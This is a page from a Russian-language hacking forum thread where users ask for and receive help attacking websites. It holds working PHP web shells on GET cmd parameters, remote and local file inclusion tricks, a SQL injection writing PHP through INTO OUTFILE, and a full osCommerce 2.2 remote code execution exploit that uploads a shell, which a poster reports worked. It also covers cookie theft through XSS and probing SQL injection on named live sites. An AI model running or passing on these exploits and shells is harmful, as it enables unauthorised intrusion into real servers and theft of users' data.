PDA

Просмотр полной версии : Ваши вопросы по уязвимостям.


Страницы : 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 [41] 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56

mailbrush
11.11.2009, 00:37
B1t.exe, при чем здесь инклуд?

mailbrush
11.11.2009, 00:39
ммм, ребята, читая ЭТУ (http://forum.antichat.ru/thread12123.html) статью - так получается...
можете сказать как делать тогда ?
Там вообще показаны примеры инклуда на твоем сервере. Чувствую я, что ты ничего не понимаешь в этом...

Aртем
11.11.2009, 00:50
B1t.exe
сделай на локалке что то подобное
<?php
$page = $_GET['page'];
include($page);
?>
и попробуй заюзать script.php?page=[inj]

wolmer
11.11.2009, 00:52
ммм, ребята, читая ЭТУ (http://forum.antichat.ru/thread12123.html) статью - так получается...
можете сказать как делать тогда ?
На локалхосте поэксперементируй с LFI, а что у тя есть исходники страницы 123.ru/...., откуда ты узнал что id именно инклудится?

Ins3t
11.11.2009, 00:53
наконец себе делал хост и пытаюсь поэкспереминтировать PHP инекции.
у меня сайт такой:
www.mysite.ru
цель: www.123.ru

на мой сайт залил скрипт:
<?
..
Include ("$page.php");

?>
открываю сайт жертвы, захожу в любой раздел и получаю такой адрес:
http://www.123.ru/index.php?action=page&id=149

мой код на сервере под названием ххх.php.

я переделываю ссылку так:
http://www.123.ru/index.php?action=http://mysite.ru/xxx.php
- открывается главная страница.
делаю так:
http://www.123.ru/index.php?action=page&id=http://mysite.ru/xxx.php
пишет:
Запрашиваемая вами страница не найдена.

Я ошибку делаю, или просто на сайте фильтровывается ?

P.S. читал здесь:
http://forum.antichat.ru/thread12123-lfi.html


Для удаленного инклуда на срвере должен быть включен allow_url_include.
В плюс к тому- очень мала вероятность того, что у тебя инклуд, тем более удаленный.

P.S.: Почитай лутше вот эту статью:
http://forum.antichat.ru/thread23501.html
В ней задохлик очень хорошо описал процесс проверения пхп инжектов. Это пожалуй лутшая статья на античате на тему php injection, ИМХО.

B1t.exe
11.11.2009, 01:05
я не понимаю .. на локалке. т.е. ?
на свем компе ? зачем?
я залил этот скрипт на сервер (интернет) и при запросе
www.mysite.ru/ххх.php
Parse error: syntax error, unexpected '.' in /home/www/mysite.ru/xxx.php on line 2
Я не знаю что там есть, просто в статье написан, что пыполните это на удаленном сервере и если выдаст те ошибки, значит инклюд есть. по этому и я так делал.

wolmer
11.11.2009, 01:08
b1t.exe, иди учи php

ILYAtirtir
11.11.2009, 01:10
Да и зачем инклудить то что в свою очередь тоже что-то инклудит?)) Если уж и есть уязвимость,то правильней было бы инклудить шелл,или какой-нить код,который надо выполнить,например копирование шелла,вотъ...
я не понимаю .. на локалке. т.е. ?
там,где якобы уязвимость.

Ins3t
11.11.2009, 01:11
2B1t.exe, омг.


<?
Include ("$page.php");
?>


Точки забыл убрать)

Есл хочешь попрактиковаться с RFI - лезь у себя в php.ini, ищи директиву allow_url_include и выставляй ее в положение ON, так как по дефолту она отрублена.
Затем можешь заюзать такой скриптек:

<?
$inc = $_GET['file'];
include ($inc);
?>

И реализовуй:
localhost/script.php?file=http://google.com

Затем постепенно усложняй:

<?
$inc = $_GET['file'];
if(file_exists($inc))
{
include ($inc);
}
else
{
echo 'ERROR!';
}
?>

И снова реализовуй:
localhost/script.php?file=ftp://login:pass@host/file.php

И так далее.

Так же если фильтруются ".", "/", юзай способ описаный товарисчем cr0w:
https://forum.antichat.ru/thread106780.html
По аналогии и с ЛФИ, нy кароче ты понял)

mailbrush
11.11.2009, 01:16
нy кароче ты понял)
Сомневаюсь...

B1t.exe, если ты действительно хочешь научиться LFI, RFI, да и вообще поиску уязвимостей, советую тебе сначала изучить пыху хотя бы поверхностно.

B1t.exe
11.11.2009, 01:25
Точки забыл убрать)
))))))) ага, точно ! спасибо большое.

У меня на этом сервере нет ничего. я специально брал домен и хост для тренировки. хост конечно, бесплатный, но поддерживает почти все, что надо.

Ins3t
11.11.2009, 01:26
я специально брал домен и хост для тренировки
о___О

А на своей тачке потестить не судьба?)

B1t.exe
11.11.2009, 01:27
mailbrush

Ok. скачаю видеокурсы, и посмотрю/послушаю. сам ужестыдно спросить каждую мелочь..

B1t.exe
11.11.2009, 01:29
Ins3t

сюдьба, даже есть денвер. просто смотря некоторые ролики в ютубе, сделал вывод, что надо иметь свой хост, чтоб туда грузить скрипты чтоб с сайтахинклюдить туда(или оттуда).. блин, уже запутался ))))))

ILYAtirtir
11.11.2009, 01:40
Для использования инклуда php знать нинадо ИМХО Прочитай в инете что эта процедура означает и не будет вопросов что инклудить и куда и откуда. И вообще локальный инклуд не часто встречается,удалённый тем более,так что лучше купи пива и раслабся,жизнь она штука сложная,не надо её себе ещё больше усложнять)

mailbrush
11.11.2009, 01:47
Для использования инклуда php знать нинадо ИМХО
Это сугубо твое мнение.
Прочитай в инете что эта процедура означает и не будет вопросов что инклудить и куда и откуда. Все взаимосвязано, если он прочитает про инклюд, у него возникнет множество вопросов, ответ на которых он сможет получить, прочитав книжку по PHP.

B1t.exe
11.11.2009, 02:12
ну.. все говорят: читай статьи а ачате ! читаю, и скажу, что 40% не понимаю из них, так как там пишут для тех, кто уже знает эти операторы или как там ..
а я не знаю не php, не perl и не sql (да и вообше я долек от кодинга). В универе проходит только паскаль и дельфи, и тот кое как препод расказал что это за чудо !

P.S. а какую книгу или видео посоветовали бы для изучение поверхности php?
когда то видел такую книгу, как PHP глазами хакера (http://www.ozon.ru/context/detail/id/2460012/) (Михаил Фленов)
Это пойдет или тут тоже ориентировано для УЖЕ знающий PHP ?

Jokester
11.11.2009, 02:20
B1t.exe
Завязывай задавать свои вопрсы в этой теме. Тема называется:
Ваши вопросы по уязвимостям.
Правила в первом посте, придерживайся их. Дальнейший оффтоп буду тереть. Можешь спрашивать вот тут:
https://forum.antichat.ru/thread153877.html

Я специально её не удалил

Ins3t
11.11.2009, 02:23
2B1t.exe, если верить нерезусу - то эта книга херня!
Тебе по сути пойдет любая.
in google --> книга по php 5 или books for php 5.

И в дальнейшем: вопросы по пхп и литературе пости в кодинг, так как к этой теме php имеет только косвенное отношение.

Twoster
11.11.2009, 06:32
Для использования инклуда php знать нинадо ИМХО
Абсолютно неверно! Если подставить &var=/etc/passwd или &var=http://google.com/? тогда да, а если нет? =) что же делать без знания php? =) Ведь такие инклуды постепенно уходят, а остаются более мудренные, а там одной фантазией не обойдешься!

Dyxxx
11.11.2009, 10:57
Для использования инклуда php знать нинадо ИМХО
Абсолютно неверно!
все таки при инклюде есть гораздо более важные моменты которые нужно знать, нежели php. но php знать все равно надо, иначе это быдло хакерство и никакого прогресса не будет ))

Twoster
11.11.2009, 12:34
Dyxxx, ну, что знать?
расположение логов? это брут (читать как тупой (!) перебор, думать не нужно)
environ? опять же та же ерунда, мозги не нужны.
А вот как составить запросы для работы с base, filter, php:// и т.п. тут уже и язык знать нужно, это тоже не верх сложности, однако тут и это многим не по силам, я знали бы пхп, и половины это темы не было бы.

Dyxxx
11.11.2009, 13:51
в большинстве случаев, самых поверхностных знаний php будет достаточно при пхпинъекте и раскрутки до рута.
наши рассуждения тут не уместны не будем флудить чье молоко вкуснее ;)

Cybersteger
11.11.2009, 14:02
http://site.ua/search.php?&stdfilter=4&instancetype=file&start=10+order+by+1--

Что здесь можно сделать?

MysqlDatabase::query - could query: SELECT /* ====================== fileinfo fields === */ f.id, f.name, f.size, f.description, DATE_FORMAT(f.uploaded, '%e.%m.%Y %H:%i') as uploaded, f.downloads, f.md5_hash, f.user_id, u.name as user_name, u.private as user_private, DATE_FORMAT(DATE_ADD( IF(f.lastdownload <> '00-00-0000 00:00:00', f.lastdownload, f.uploaded), INTERVAL c.delafter DAY), '%e.%m.%Y') as willremove, (SELECT COUNT(*) FROM filecomment WHERE file_id = f.id) as comment_count, f.password, f.tree_id, f.category_id, ctg.name as category_name, IF(u.id <> -1 AND u.deadline > NOW(), 1, 0) as premium, f.isprivate, f.ispermanent, fu.upload_id, /* ====================== search fields === */ 1 as is_file, 1000 as order_row, UCASE(f.name) as name_sort, UCASE(f.description) as description_sort, DATE_FORMAT(f.uploaded, '%Y%j%H%i') as uploaded_sort, DATE_FORMAT(DATE_ADD( IF(f.lastdownload <> '00-00-0000 00:00:00', f.lastdownload, f.uploaded), INTERVAL c.delafter DAY), '%Y%j') as willremove_sort, 0 as files_count FROM file f JOIN cleanup c ON f.size >= c.gebytes AND f.size < c.ltbytes JOIN category ctg ON ctg.id = f.category_id JOIN user u ON u.id = f.user_id LEFT JOIN fileupload fu ON fu.file_id = f.id WHERE f.id IN (901157417, 9011574,........ 901157658, 901157659, 901157660) ORDER BY is_file ASC , uploaded_sort desc LIMIT 10 order by 1--, 10 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1--, 10' at line 47

Iceangel_
11.11.2009, 14:27
2Cybersteger
инъекция в лимите, после ордер бая, ничего не сделаешь.

mailbrush
11.11.2009, 14:27
Cybersteger, у тебя инъекция в лимите, а оператор ORDER должен идти перед LIMIT.

Cybersteger
11.11.2009, 14:47
http://upload.com.ua/search.php?&stdfilter=4&instancetype=file&start=10 ггг)))))

Iceangel_
11.11.2009, 14:48
2Cybersteger
Но я то поняв а что можно из этого вытянуть ? ничо?
Я тебе ясно сказал, что непонятного? (Инъекция в лимите после ордербая невозможна)

Cybersteger
11.11.2009, 14:50
Благодарю за то что просветили

vorona
11.11.2009, 15:59
как отправить ПОСТ-запрос, не нажимая на кнопку субминт?

Iceangel_
11.11.2009, 16:08
как отправить ПОСТ-запрос, не нажимая на кнопку субминт?
сформировать пакет и отправить (сокеты\curl)

cr0w
11.11.2009, 16:32
2Cybersteger

Я тебе ясно сказал, что непонятного? (Инъекция в лимите после ордербая невозможна)
Почему же? Можно попробовать залить шелл с помощью into outfile, если есть file_priv.

Jokester
11.11.2009, 17:00
Почему же? Можно попробовать залить шелл с помощью into outfile, если есть file_priv.
Это не ответ. Поясни пожалуйста. Насколько мне известно в лимите выражения не работают. Никакие.

Qwazar
11.11.2009, 17:06
Поясняю
SELECT id from news ORDER BY 1 LIMIT 1 INTO OUTFILE '/tmp/result11.txt' LINES TERMINATED BY '<?php phpinfo(); ?>'

vorona
11.11.2009, 17:07
сформировать пакет и отправить (сокеты\curl)
Спасибо. А пример можно?

dr.Pilulkin
11.11.2009, 17:53
Можно отправить с помощью javascript.

<form action="/script.php" method="post">
<input type="text" name="param" value="lol">
</form>
<script language="javascript">
document.forms[0].submit();
</script>

Или из строки браузера

javascript:document.forms[номер формы].submit();

vorona
11.11.2009, 18:58
А как с помощью сокета?

L I G A
11.11.2009, 19:00
http://rus-phpnuke.com/php/f/fsockopen.html
vorona темой ошибся

vorona
11.11.2009, 20:04
http://rus-phpnuke.com/php/f/fsockopen.html
vorona темой ошибся
та я везде ошибаюсь. оттуда прогнали, оттуда прогнали... неужеди трудно посоветовать...

vorona
11.11.2009, 20:10
и там нету ничего, что мне нужно. те ф-ции я знаю.
есть скрипт 1.php с ПОСТ-формой. Есть скрипт 2.php , который принимает ПОСТ-запросы с первого. Как без участвия первого, передать ПОСТ-запрос второму?

Ins3t
11.11.2009, 21:07
есть скрипт 1.php с ПОСТ-формой. Есть скрипт 2.php , который принимает ПОСТ-запросы с первого. Как без участвия первого, передать ПОСТ-запрос второму?

Что мешает сделать свою "ПОСТ форму" и отправлять с не запрос на скрипт номер 2 ?

Aртем
11.11.2009, 21:30
и там нету ничего, что мне нужно. те ф-ции я знаю.
есть скрипт 1.php с ПОСТ-формой. Есть скрипт 2.php , который принимает ПОСТ-запросы с первого. Как без участвия первого, передать ПОСТ-запрос второму?
как вариант
<?php
$ci = curl_init(); // открываешь соединение
curl_setopt($ci, CURLOPT_URL, "http://сайт_где_находится_скрипт/сам_скрипт.php"); // указывай ссылку на свой скрипт здесь
curl_setopt($ci, CURLOPT_POST, true); // выбираешь пост запрос
curl_setopt($ci, CURLOPT_POSTFIELDS, "параметр1=значение&параметр2=значение"); // перечесляешь запросы
curl_exec($ci); // выполняешь запрос, и получешь ответ
curl_close($ci); // закрываешь соединение
?>

Train
11.11.2009, 21:41
to Qwazar
SELECT id from news ORDER BY 1 LIMIT 1 INTO OUTFILE '/tmp/result11.txt' LINES TERMINATED BY '<?php phpinfo(); ?>'
Круто, не знал, не видел никогда. блин круто.

to vorona
А еще можно на JS с помощью AJAX обращаться к скрипту пост запросом :)

vorona
11.11.2009, 21:42
Что мешает сделать свою "ПОСТ форму" и отправлять с не запрос на скрипт номер 2 ?
ничего. но в своей форме опять же нада нажимать на кнопку субмит. ничё не меняется по сути.

vorona
11.11.2009, 21:44
как вариант
<?php
$ci = curl_init(); // открываешь соединение
curl_setopt($ci, CURLOPT_URL, "http://сайт_где_находится_скрипт/сам_скрипт.php"); // указывай ссылку на свой скрипт здесь
curl_setopt($ci, CURLOPT_POST, true); // выбираешь пост запрос
curl_setopt($ci, CURLOPT_POSTFIELDS, "параметр1=значение&параметр2=значение"); // перечесляешь запросы
curl_exec($ci); // выполняешь запрос, и получешь ответ
curl_close($ci); // закрываешь соединение
?>
спс, попробую таким способом.

vorona
11.11.2009, 21:49
Fatal error: Unknown function: curl_init() in T:\home\virtual\site.ru\spam.php on line 2

$n@ke
11.11.2009, 21:52
Синий фломастер пишет белым....


зы: Мне тоже такие бестолковые посты начинать писать???

Когда же гугл станет домашней страницей ворон...и других?

https://forum.antichat.ru/showthread.php?t=103580
http://forum.antichat.ru/showthread.php?t=55424
http://forum.dklab.ru/viewtopic.php?t=7155

Roston
12.11.2009, 10:28
просто поставь пакет с новым пхп, за одно и его обновиш. на php.net точно он есть

sideup
12.11.2009, 13:49
Добрый день!

Подскажите пожалуйста

не могу записать в файл на сервере код CMD

<?php system($_GET["cmd"]); ?>

сервер походу фильтрует кавычки.

Подскажите как это обойти, чтобы получить шелл.

Или это невозможно?

Ctacok
12.11.2009, 13:50
Добрый день!

Подскажите пожалуйста

не могу записать в файл на сервере код CMD

<?php system($_GET["cmd"]); ?>

сервер походу фильтрует кавычки.

Подскажите как это обойти, чтобы получить шелл.

Или это невозможно?
<?php system($_GET[cmd]); ?>

:(

Aртем
12.11.2009, 13:51
Добрый день!

Подскажите пожалуйста

не могу записать в файл на сервере код CMD

<?php system($_GET["cmd"]); ?>

сервер походу фильтрует кавычки.

Подскажите как это обойти, чтобы получить шелл.

Или это невозможно?
:( печальный вопрос
<?system($_GET[cmd])?>
<?eval($_GET[cmd])?>
<?passthru($_GET[cmd])?>
<?eval($_REQUEST[cmd])?>
<?passthru($_REQUEST[cmd])?>
<?system($_REQUEST[cmd])?>

и да, мне интересно через что ты заливаешь шелл?
если через скулинъект, то как бы ты не сможешь вообще ничего залить если у тебя как ты говоришь ГПЦ=ОН

sideup
12.11.2009, 14:33
Warning: Wrong parameter count for system() in

/home/site-shop.com/site/site/shell.php on line 1

При выполнении шелла такая ошибка.

icekvot
12.11.2009, 14:40
Подскажите. Могу читать файлы и листинг файлов в папке через cgi
Папку "?lang=../../../../WINDOWS/" выводит нормально. А вот в "?lang=../../../../Documents and Settings/" не получается. Походу из-за пробелов.Как бы это обойти. Прочтовал пробел заменить на 0x20 непомогло. Также попробовал всю строку представить в других кодировках (url, sql, char) непомогает.

Aртем
12.11.2009, 14:48
Warning: Wrong parameter count for system() in

/home/site-shop.com/site/site/shell.php on line 1

При выполнении шелла такая ошибка.
а ты передавал команды?

-m0rgan-
12.11.2009, 14:50
Warning: Wrong parameter count for system() in

/home/site-shop.com/site/site/shell.php on line 1

При выполнении шелла такая ошибка.
кагбэ так:

http://127.0.0.1/index.php?cmd=ls
и т д

geezer.code
12.11.2009, 14:53
Подскажите. Могу читать файлы и листинг файлов в папке через cgi
Папку "?lang=../../../../WINDOWS/" выводит нормально. А вот в "?lang=../../../../Documents and Settings/" не получается. Походу из-за пробелов.Как бы это обойти. Прочтовал пробел заменить на 0x20 непомогло. Также попробовал всю строку представить в других кодировках (url, sql, char) непомогает.
возможно надо сделать "Documents\ and\ Settings"

Ctacok
12.11.2009, 14:54
Подскажите. Могу читать файлы и листинг файлов в папке через cgi
Папку "?lang=../../../../WINDOWS/" выводит нормально. А вот в "?lang=../../../../Documents and Settings/" не получается. Походу из-за пробелов.Как бы это обойти. Прочтовал пробел заменить на 0x20 непомогло. Также попробовал всю строку представить в других кодировках (url, sql, char) непомогает.
В Documents and Setting незайдёшь из шелла, ибо прав нету =\

Aртем
12.11.2009, 15:01
Подскажите. Могу читать файлы и листинг файлов в папке через cgi
Папку "?lang=../../../../WINDOWS/" выводит нормально. А вот в "?lang=../../../../Documents and Settings/" не получается. Походу из-за пробелов.Как бы это обойти. Прочтовал пробел заменить на 0x20 непомогло. Также попробовал всю строку представить в других кодировках (url, sql, char) непомогает.
в DOS формате заюзать попробуй ;)

sideup
12.11.2009, 15:02
кагбэ так:

http://127.0.0.1/index.php?cmd=ls
и т д


Да. Конечно. Но ничего.

Пробовал <?php phpinfo(); ?> работает отлично.

Залил вот это <?php%20@eval(\$_POST[cmd]);?> ошибок

не выдаёт, но что-то не пойму как команды выполнять

shell.php?cmd=id не катит.

L I G A
12.11.2009, 15:04
Да. Конечно. Но ничего.

Пробовал <?php phpinfo(); ?> работает отлично.

Залил вот это <?php%20@eval(\$_POST[cmd]);?> ошибок

не выдаёт, но что-то не пойму как команды выполнять

shell.php?cmd=id не катит.
переметру cmd передавай пых код

Root-access
12.11.2009, 15:06
Да. Конечно. Но ничего.

Пробовал <?php phpinfo(); ?> работает отлично.

Залил вот это <?php%20@eval(\$_POST[cmd]);?> ошибок

не выдаёт, но что-то не пойму как команды выполнять

shell.php?cmd=id не катит.


Ошибок не выдаёт, потому что перед eval стоит @.
Чтоб команды выполнять, надо отправлять команды через POST. Для этого можно, к примеру, написать форму, а можно пользоваться программой для подделки http-заголовка. Типа InetCrack или HTTPReq
В общем заливай так: <?php eval(\$_GET['cmd']); ?>

Aртем
12.11.2009, 15:09
Да. Конечно. Но ничего.

Пробовал <?php phpinfo(); ?> работает отлично.

Залил вот это <?php%20@eval(\$_POST[cmd]);?> ошибок

не выдаёт, но что-то не пойму как команды выполнять

shell.php?cmd=id не катит.
#10081 (http://forum.antichat.ru/showpost.php?p=1682315&postcount=10081) :mad:

sideup
12.11.2009, 15:10
переметру cmd передавай пых код

Если не трудно можно пример такого запроса для:

pwd;ls -l

Aртем
12.11.2009, 15:13
Если не трудно можно пример такого запроса для:

pwd;ls -l
в случае с eval() то shell.php?cmd=system(ls -la);

sideup
12.11.2009, 15:13
:( печальный вопрос
<?system($_GET[cmd])?>
<?eval($_GET[cmd])?>
<?passthru($_GET[cmd])?>
<?eval($_REQUEST[cmd])?>
<?passthru($_REQUEST[cmd])?>
<?system($_REQUEST[cmd])?>

и да, мне интересно через что ты заливаешь шелл?
если через скулинъект, то как бы ты не сможешь вообще ничего залить если у тебя как ты говоришь ГПЦ=ОН

Не работает из этого ничего.

<?php phpinfo(); ?> работает отлично

Aртем
12.11.2009, 15:14
Не работает из этого ничего.

<?php phpinfo(); ?> работает отлично
ты как бы вопрос там видел? нет? я повторю:
через что ты заливаешь шелл?
[a] - SQL инъекция
[b] - PHP инъкция
[c] - Через какой-нибудь файловый менеджер.

sideup
12.11.2009, 15:20
ты как бы вопрос там видел? нет? я повторю:
через что ты заливаешь шелл?
[a] - SQL инъекция
[b] - PHP инъкция
[c] - Через какой-нибудь файловый менеджер.

Вот отсюда взял

http://www.milw0rm.com/exploits/9556

Aртем
12.11.2009, 15:25
хм... а в чем сложность запустить сплоит?
я его чуть-чуть подправил... но всё же, ты руками что-ли делаешь?
<?php
print_r('
+---------------------------------------------------------------------------+
osCommerce Online Merchant 2.2 RC2a RCE Exploit
by Flyh4t
mail: phpsec@hotmail.com
team: http://www.wolvez.org
dork: Powered by osCommerce
Gr44tz to q1ur3n 、puret_t、uk、toby57 and all the other members of WST
Thx to exploits of blackh
+---------------------------------------------------------------------------+
');
$host ='domain.com';
$path = '/';
$admin_path = 'admin/';
$shellcode = "filename=fly.php&file_contents=test<?php%20@eval(\$_GET[aifly]);?>";
$message="POST ".$path.$admin_path."file_manager.php/login.php?action=save HTTP/1.1\r\n";
$message.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$message.="Accept-Language: zh-cn\r\n";
$message.="Content-Type: application/x-www-form-urlencoded\r\n";
$message.="Accept-Encoding: gzip, deflate\r\n";
$message.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$message.="Host: $host\r\n";
$message.="Content-Length: ".strlen($shellcode)."\r\n";
$message.="Connection: Close\r\n\r\n";
$message.=$shellcode;
$fd = fsockopen($host,'80');
if(!$fd)
{
echo '[~]No response from'.$host;
die;
}
fputs($fd,$message);
echo ("[+]Go to see U webshell : $host/fly.php");
?>
шел будет тут и запускаться так domain.com/fly.php?aifly=[PHP-КОД]

sideup
12.11.2009, 15:26
в случае с eval() то shell.php?cmd=system(ls -la);


Не работает :(

Jokester
12.11.2009, 15:33
я его чуть-чуть подправил...

Угу, ты хакер. Поменял
$host ='democn.51osc.com';
на
$host ='domain.com'; ? Круто!

=====================
sideup

Залей туда
<?php eval(stripslashes($_REQUEST[ev])); ?>
и обратись к скрипту вот так:

shell.php?ev=phpinfo();

=======================

sideup
12.11.2009, 15:35
хм... а в чем сложность запустить сплоит?
я его чуть-чуть подправил... но всё же, ты руками что-ли делаешь?
<?php
print_r('
+---------------------------------------------------------------------------+
osCommerce Online Merchant 2.2 RC2a RCE Exploit
by Flyh4t
mail: phpsec@hotmail.com
team: http://www.wolvez.org
dork: Powered by osCommerce
Gr44tz to q1ur3n 、puret_t、uk、toby57 and all the other members of WST
Thx to exploits of blackh
+---------------------------------------------------------------------------+
');
$host ='domain.com';
$path = '/';
$admin_path = 'admin/';
$shellcode = "filename=fly.php&file_contents=test<?php%20@eval(\$_GET[aifly]);?>";
$message="POST ".$path.$admin_path."file_manager.php/login.php?action=save HTTP/1.1\r\n";
$message.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$message.="Accept-Language: zh-cn\r\n";
$message.="Content-Type: application/x-www-form-urlencoded\r\n";
$message.="Accept-Encoding: gzip, deflate\r\n";
$message.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$message.="Host: $host\r\n";
$message.="Content-Length: ".strlen($shellcode)."\r\n";
$message.="Connection: Close\r\n\r\n";
$message.=$shellcode;
$fd = fsockopen($host,'80');
if(!$fd)
{
echo '[~]No response from'.$host;
die;
}
fputs($fd,$message);
echo ("[+]Go to see U webshell : $host/fly.php");
?>
шел будет тут и запускаться так domain.com/fly.php?aifly=[PHP-КОД]


СПАСИБО!!! РАБОТАЕТ. :) :) :)

Aртем
12.11.2009, 15:36
Угу, ты хакер. Поменял
$host ='democn.51osc.com';
на
$host ='domain.com'; ? Круто!

=====================
sideup

Залей туда
<?php eval(stripslashes($_REQUEST[ev])); ?>
и обратись к скрипту вот так:

shell.php?ev=phpinfo();

=======================
Угу, внимательный мистер. Вообще-то если ты не заметил по предыдущем постам, sideup, запрашивал через GET eval() когда ОН РУССКИМИ БУКВАМИ БЕРЕТ ТОЛЬКО POST. Не выебывайся :)

Jokester
12.11.2009, 15:41
Угу, внимательный мистер. Вообще-то если ты не заметил по предыдущем постам, sideup, запрашивал через GET eval() когда ОН РУССКИМИ БУКВАМИ БЕРЕТ ТОЛЬКО POST. Не выебывайся :)
Дружище, не нужно советовать новичкам работать с Гетом. И уж тем более не нужно исправлять нормальные сплоиты для работы через гет. Можно было объяснить, как отправлять пост данные в таком случае.
А то потом получаются недохакеры и баги нормальные палятся админами после таких чудесных доработок

Aртем
12.11.2009, 15:45
Дружище, не нужно советовать новичкам работать с Гетом. И уж тем более не нужно исправлять нормальные сплоиты для работы через гет. Можно было объяснить, как отправлять пост данные в таком случае.
А то потом получаются недохакеры и баги нормальные палятся админами после таких чудесных доработок
Уважаемый. Я очень сильно сомневаюсь, что нормальные администраторы забыли пропатчить свою CMS, после того, как опубликовался сплоит на милворме, а после этого, ты хоть пост, хоть гет, хоть через сессию юзай сплоиты и шелы.

И потом:
<title>Форум АНТИЧАТ - безопасность WEB - интерфейсов</title>
По-этому здесь должны советовать не только как заюзать паблик сплоит, что бы админы не узнали о критической уязвимости :confused: а еще и советовать как это дело поправить :)

Не путай паблик и приват :o

Kadness
12.11.2009, 19:11
Просканировал один форум черех Xspider 7.5 выдало куки подскажите с ними можно чтонить зделать вот они:
1. snwfoum_u=1; expires=Fri, 12-Nov-2010 11:54:05 GMT; path=/; domain=forum.snw.ru; HttpOnly
2. snwfoum_k=; expires=Fri, 12-Nov-2010 11:54:05 GMT; path=/; domain=forum.snw.ru; HttpOnly
3. snwfoum_sid=6743b15f8fe25caed4d19aeb436c49a3; expires=Fri, 12-Nov-2010 11:54:05 GMT; path=/; domain=forum.snw.ru; HttpOnly

Pashkela
12.11.2009, 19:22
Молодец, ты получил доступ к гостевым кукам, которые сайт устанавливает для любого посетителя

Aртем
12.11.2009, 19:23
Просканировал один форум черех Xspider 7.5 выдало куки подскажите с ними можно чтонить зделать вот они:
1. snwfoum_u=1; expires=Fri, 12-Nov-2010 11:54:05 GMT; path=/; domain=forum.snw.ru; HttpOnly
2. snwfoum_k=; expires=Fri, 12-Nov-2010 11:54:05 GMT; path=/; domain=forum.snw.ru; HttpOnly
3. snwfoum_sid=6743b15f8fe25caed4d19aeb436c49a3; expires=Fri, 12-Nov-2010 11:54:05 GMT; path=/; domain=forum.snw.ru; HttpOnly
нет.

YuNi|[c
12.11.2009, 19:29
аналогично посту на котором постил вчера(нестандартный скул), вот еще одинь но теперь MySQLi.
http://www.mytradingrobot.com/amember/signup.php?product_id=1')&paysys_id_not_required=&paysys_id=free&name_f=111-222-1934email@address.tst&name_l=111-222-1934email@address.tst&email=sample4%40email%2Etst&login=Jottiorg&pass0=111-222-1934email@address.tst&pass1=111-222-1934email@address.tst&do_payment=1&price_group=111-222-1934email@address.tst

выдает:
MYSQL ERROR:<br />You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '', '2009-11-12', '2009-12-12', 'free', '0', 0, '81.95.235.1' at line 6<br />in query:<br />INSERT INTO amember_payments (member_id, product_id, begin_date, expire_date, paysys_id, amount, completed, remote_addr, data, time, tm_added, tax_amount) VALUES ('2938', '1')', '2009-11-12', '2009-12-12', 'free', '0', 0, '181.100.25.16', 'a:4:{s:15:\"COUPON_DISCOUNT\";d:0;s:10:\"TAX_AMOUNT\";d:0;s:5:\"TAXES\";a:0:{}i:0;a:15:{s:10:\"product_id\";s:3:\"1\')\";s:22:\"paysys_id_not_required\";s:0:\"\";s:9:\"paysys_id\";s:4:\"free\";s:6:\"name_f\";s:29:\"111-222-1934email@address.tst\";s:6:\"name_l\";s:29:\"111-222-1934email@address.tst\";s:5:\"email\";s:17:\"sample4@email.tst\";s:5:\"login\";s:8:\"jottiorg\";s:5:\"pass0\";s:6:\"******\";s:5:\"pass1\";s:6:\"******\";s:10:\"do_payment\";s:1:\"1\";s:11:\"price_group\";s:29:\"111-222-1934email@address.tst\";s:6:\"aff_id\";N;s:14:\"email_verified\";i:-1;s:15:\"BASKET_PRODUCTS\";a:1:{i:0;s:3:\"1\')\";}s:13:\"BASKET_PRICES\";a:1:{i:1;d:0;}}}', NOW(), NOW(), '0')

прочел статьи Elekt и kot777 не помогает. Помогите раскрутит

Kadness
12.11.2009, 19:46
Есть еще уязвимость называется SQL иньекция как ее юзать ктонить знает???Или есть какая-нибуть прога для кражи куки с форумов?На ютубе видел видео как крали через какуюта прогу!!!

Kadness
12.11.2009, 20:04
А про XSS можно по подробнее как красть или где можно почитать???В гугле полазил толком ничего не нашел(((

Krist_ALL
12.11.2009, 20:05
http://forum.antichat.ru/thread20140.html

на несколько строк ниже трудно было посмотреть?

jecka3000
12.11.2009, 20:35
нужна отдельная софтина для поиск админок, встроенных внутрь других не устраивает(типа SQLhelper)

Krist_ALL
12.11.2009, 20:40
нужна отдельная софтина для поиск админок, встроенных внутрь других не устраивает(типа SQLhelper)

http://security-digger.org/

или мой сканер директорий. https://hashcracking.info/forum/viewtopic.php?f=17&t=392

Kadness
12.11.2009, 20:54
А как через онлайн сниффер увести куки???Точнее через этот снифферhttp://hacker-pro.net/sniffer а то чето я протестил прошел по своей ссылки, а там написан ип мой и откуда перешел.Куков я чото найти не могу(((

Aртем
12.11.2009, 20:56
в ксс отсылаешь куки на снифер, что сложного, тебе же дали статью, подумай наконец в первый раз в жизни СВОЕЙ головой САМ.

YuNi|[c
12.11.2009, 21:08
аналогично посту на котором постил вчера(нестандартный скул), вот еще одинь но теперь MySQLi.
http://www.mytradingrobot.com/amember/signup.php?product_id=1')&paysys_id_not_required=&paysys_id=free&name_f=111-222-1934email@address.tst&name_l=111-222-1934email@address.tst&email=sample4%40email%2Etst&login=Jottiorg&pass0=111-222-1934email@address.tst&pass1=111-222-1934email@address.tst&do_payment=1&price_group=111-222-1934email@address.tst

выдает:


прочел статьи Elekt и kot777 не помогает. Помогите раскрутит

ребята вы на это тоже посмотрите а то так и завалится под тупых вопросов

vorona
12.11.2009, 21:12
Как защититься от XSS?

LzD
12.11.2009, 21:15
Как защититься от XSS?
учить матчасть :(

Ins3t
12.11.2009, 21:17
Фильтруй передаваемые данные.
Могу порекомендовать функцию htmlspecialchars() превращающую HTML теги в HTML сущности. От нее отталкивайся.

Kadness
12.11.2009, 21:18
Теперь надо разобратся как переделать свою XSS с запросом на сниффер))))

vorona
12.11.2009, 21:20
учить матчасть :(
йасно

Pashkela
